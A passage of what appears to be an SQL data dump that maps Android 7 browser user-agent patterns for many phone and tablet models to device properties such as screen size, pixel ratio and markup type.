Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BG2-U03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":450,\"screenHeight\":768,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BGH Joy 303) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BL12000 PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BL12000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BL5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BL7000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BLADE A320) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BLADE A520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BLADE A521) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BLADE A6 MAX) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BLADE A6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BLADE L7A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BLADE V8 SE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BLADE V8) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BLADE V8Q) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BLL-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BLL-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BLL-L23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BLN-AL30) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BLN-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BLN-L22) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BLN-L24) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BLU Grand X LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_blu','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BLU_S1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BMM542D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BMM_533D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BND-AL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BND-L21) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-4077) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-4585) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5001L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5003L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5005L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5007L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5008L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5009L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5012L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5056) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":641,\"pixelRatio\":1.33333,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5057) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5058) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5059) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5201) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5206L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5209L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5211) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5301) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5340) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5500L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5507L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5508L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5511L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5522) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5591) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5594) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5700L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-5701L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-6000L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ-6001L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQ3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-1056L) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-4072) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-4500) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-4526) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-4583) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-5000) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-5022) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-5033) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-5035) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-5037) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-5044) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-5054) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-5057) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-5059) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-5060) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-5201) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-5202) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-5203) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-5204) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-5503) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-5504) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-5510) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru-5525) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru_5590) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BQru_BQru-5058) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 7.*; BRAVIS A554) AppleWebKit/* (KHTML, like Gecko) Chrome 